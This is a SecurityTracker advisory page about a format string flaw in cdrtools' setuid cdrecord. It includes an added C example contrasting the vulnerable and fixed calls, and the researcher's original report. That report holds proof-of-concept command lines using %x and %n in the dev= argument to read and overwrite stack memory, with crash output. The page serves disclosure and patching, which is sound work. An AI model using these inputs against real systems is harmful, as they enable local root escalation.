SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   cdrtools
Vendors:   Schilling, J.
'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1006751
SecurityTracker URL:  http://securitytracker.com/id/1006751
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 14 2003
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2.0
Description:   A format string vulnerability was reported in 'cdrecord' in the 'cdrtools' package. A local user can gain elevated privileges on the system, including root privileges on some distributions.

It is reported that libscg/scsiopen.c contains a format string flaw at line 273, where js_snprintf() is called with scgp->errstr as its format string instead of a fixed format. Because the error string embeds the user-supplied 'dev' argument, a local user can set 'dev' to a specially crafted value containing conversion specifiers (such as '%x' to read stack words or '%n' to write memory) to trigger the flaw and potentially execute arbitrary code. The privileges that the code will run with depend on how the package was installed. According to the report, cdrecord is installed set-user-id (setuid) root on some distributions.
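The following is an added example, not code from cdrtools or from the advisory's author: a minimal re-creation of the failing open path in C, showing the vulnerable call (error string used as the format) next to the fixed call (constant "%s" format, error string passed as data), plus a small audit helper that counts how many conversion directives a user-controlled string would act on if it reached a format argument. The names js_snprintf, build_errstr, report_vuln, report_fixed and count_directives are this example's own stand-ins for the libscg code and are assumptions; the input strings are constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not cdrtools code. All function names are this
 * example's own stand-ins for the libscg names in the advisory. */

/* Stand-in for schily's js_snprintf(): a thin vsnprintf() wrapper.
 * Because the format parameter is a variable rather than a literal,
 * the compiler's format-security warning does not see the misuse
 * at the call site. */
static int js_snprintf(char *buf, size_t len, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(buf, len, fmt, ap);
    va_end(ap);
    return n;
}

/* cdrecord's open-failure message embeds the dev= name verbatim
 * ("Cannot open 'AAAA|%x%x...'"), which is how user input reaches
 * the error string that line 273 then uses as a format. */
static void build_errstr(char *errstr, size_t len, const char *devname)
{
    snprintf(errstr, len, "Cannot open '%s'.", devname);
}

/* Before the fix (scsiopen.c line 273): errstr itself is the format,
 * so each %x reads one word of the caller's stack and %n writes to it. */
static void report_vuln(const char *devname, char *errs, size_t slen)
{
    char errstr[256];

    build_errstr(errstr, sizeof errstr, devname);
    js_snprintf(errs, slen, errstr);        /* user-controlled format */
}

/* After the fix: a constant format; errstr is only an argument and any
 * '%' inside it is copied literally. */
static void report_fixed(const char *devname, char *errs, size_t slen)
{
    char errstr[256];

    build_errstr(errstr, sizeof errstr, devname);
    js_snprintf(errs, slen, "%s", errstr);
}

/* Audit helper: count the conversion directives a string would act on
 * if it were used as a printf format. "%%" is an escaped percent sign
 * and is not counted. Handy for triaging user-controlled values that
 * flow into a printf-family format parameter. */
static int count_directives(const char *s)
{
    int n = 0;

    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" prints a single '%' */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed input: "%%" is used instead of "%x" so the run is
     * deterministic. With "%x" the vulnerable path would dump stack
     * words as in the advisory, and with "%n" it would write memory. */
    const char *dev = "AAAA|%%|";
    char out[256];

    report_vuln(dev, out, sizeof out);
    printf("vulnerable: %s\n", out);    /* Cannot open 'AAAA|%|'.  */
    report_fixed(dev, out, sizeof out);
    printf("fixed:      %s\n", out);    /* Cannot open 'AAAA|%%|'. */
    printf("directives in \"AAAA|%%x%%x%%x\": %d\n",
           count_directives("AAAA|%x%x%x"));
    return 0;
}
```

The vulnerable path collapses the "%%" in the device name to a single "%", proving the string was interpreted as a format; the fixed path copies it unchanged. The same one-character difference at line 273 of scsiopen.c is what the vendor's fix and solution B in the report below apply.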

Impact:   A local user can execute arbitrary code with elevated privileges on the system. The specific privileges depend on how the particular distribution installs cdrecord; on distributions that install it setuid root, the local user can obtain root privileges.
Solution:   The vendor has released a fixed alpha version (2.01a14), available at:

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

Vendor URL:  www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Exploit is Available) Re: 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
Some exploit code has been released.
(Mandrake Issues Revised Fix) 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
The vendor has released a revised fix to address some additional format string flaws.



 Source Message Contents

Subject:  cdrtools2.0 Format String Vulnerability



----------------------------------------------------------------------------
PACKAGE           : cdrtools
VERSION           : 2.0
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE              : 2003-05-05
----------------------------------------------------------------------------


Hi,
I would like to inform you that there is a format string vulnerability
in cdrecord 2.0, in particular in libscg/scsiopen.c at line 273, I
suppose:

--------------------------------------------------------------
   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)

>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
   
   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
_______________________________________________________
!-------         W A R N I N G      -----------!  
!--- this  is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as a setuid program, so this is a real
security hole.

e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jörg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: No such file or directory. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
As you can see, the last %x refers to AAAABBBBCCCC, so I can use %n for
overwriting anything I want:
e.g. I can find on the stack the location of the return address...
let's say 0xbffcffcc:
$ ./cdrecord dev=`printf "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` c/int.c
.....snip....
(core dump)
$ gdb   `which cdrecord`  core -q
....snip...
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()
...

So it's exploitable.

Solutions:

A. Updated package can be found on:

	ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of libscg/scsiopen.c with:
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. remove the suid bit with:
	chmod 755 `which cdrecord`



Regards,
Stefano Di Paola

------------------

Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com



 
 



Copyright 2021, SecurityGlobal.net LLC